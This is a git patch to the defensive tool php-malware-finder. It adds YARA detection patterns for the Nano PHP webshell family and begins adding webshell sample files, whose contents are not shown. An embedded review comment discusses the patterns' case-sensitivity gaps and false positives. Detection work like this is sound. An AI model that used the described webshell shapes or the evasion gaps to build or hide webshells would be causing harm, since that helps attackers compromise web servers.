From a5cc4cccc1a6c66210056194b8bd5638855fd09b Mon Sep 17 00:00:00 2001 From: jvoisin Date: Tue, 29 May 2018 13:20:40 +0200 Subject: Add detection for Nano [Nano]( https://github.com/UltimateHackers/nano ) is a family of PHP webshells which are code golfed to be extremely stealthy and efficient. --- README.md | 1 + php-malware-finder/php.yar | 2 ++ php-malware-finder/samples/real/nano.php | 1 + php-malware-finder/samples/real/ninja.php | 1 + php-malware-finder/tests.sh | 3 +++ 5 files changed, 8 insertions(+) create mode 100644 php-malware-finder/samples/real/nano.php create mode 100644 php-malware-finder/samples/real/ninja.php diff --git a/README.md b/README.md index 01d1401..c458785 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ The following list of encoders/obfuscators/webshells are also detected: * [web-malware-collection]( https://github.com/nikicat/web-malware-collection ) * [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ ) * [novahot]( https://github.com/chrisallenlane/novahot ) +* [nano]( https://github.com/UltimateHackers/nano ) Of course it's **trivial** to bypass PMF, diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar index f0abcb4..143b192 100644 --- a/php-malware-finder/php.yar +++ b/php-malware-finder/php.yar @@ -65,6 +65,8 @@ rule ObfuscatedPhp $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html + $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano + $ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano $variable_variable = /\${\$[0-9a-zA-z]+}/ $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()` $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words 
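Review bot: The `$nano` string's character class `[a-z0-9-_]` has no uppercase range and the string carries no `nocase`, so a call through an uppercase variable such as `$_GET[0]($_POST[1])` or `$_REQUEST['c']()` fails at the `\[` even though that is presumably the shape this string is meant to catch; the literal `-` in the class is also not a legal PHP identifier character. Replacing the class with `\w`, which YARA defines as `[A-Za-z0-9_]`, covers every legal variable name: `$nano = /\$\w+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano`. The same shape is also the ordinary PHP idiom for invoking a callable stored in an array (`$handlers[$type]($payload)`), so this string should carry little weight on its own in the rule's condition, which lies outside the hunk, as does the rest of `rule ObfuscatedPhp`. `$ninja` is likewise case-sensitive while PHP resolves function names case-insensitively, so `Base64_Decode(...GetAllHeaders()...)` slips past unless that string gets `nocase` as well.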
diff --git a/php-malware-finder/samples/real/nano.php b/php-malware-finder/samples/real/nano.php new file mode 100644 index 0000000..14df255 --- /dev/null +++ b/php-malware-finder/samples/real/nano.php @@ -0,0 +1 @@ +